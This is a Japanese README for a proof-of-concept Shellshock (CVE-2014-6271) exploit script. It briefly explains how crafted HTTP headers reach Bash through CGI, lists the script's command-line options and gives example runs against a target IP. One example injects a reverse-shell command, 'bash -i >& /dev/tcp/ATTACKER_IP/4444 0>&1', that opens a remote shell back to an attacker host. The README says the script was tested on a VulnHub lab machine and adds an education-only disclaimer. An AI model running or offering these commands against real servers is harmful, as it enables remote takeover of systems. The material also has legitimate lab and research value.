
CVE-2014-6271 エクスプロイト | 作者: infrar3d
infrar3d によるエクスプロイト
このリポジトリには、CVE-2014-6271 (Shellshock) の概念実証エクスプロイトが含まれています。
Shellshock は GNU Bash における深刻な脆弱性で、特別に細工された環境変数によって任意のコマンド実行が可能になります。
Web サーバーが Bash を呼び出す CGI スクリプトに HTTP ヘッダーを渡す場合、攻撃者はそのヘッダーを介してコマンドを注入できます。
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(VulnHub のマシン「Hacksudo - Thor」でテスト済み)
このソフトウェアおよび概念実証コードは、教育および研究目的のみで提供されています。
適用されるすべての法律を遵守する責任はあなたにあります。倫理的かつ責任を持って使用してください。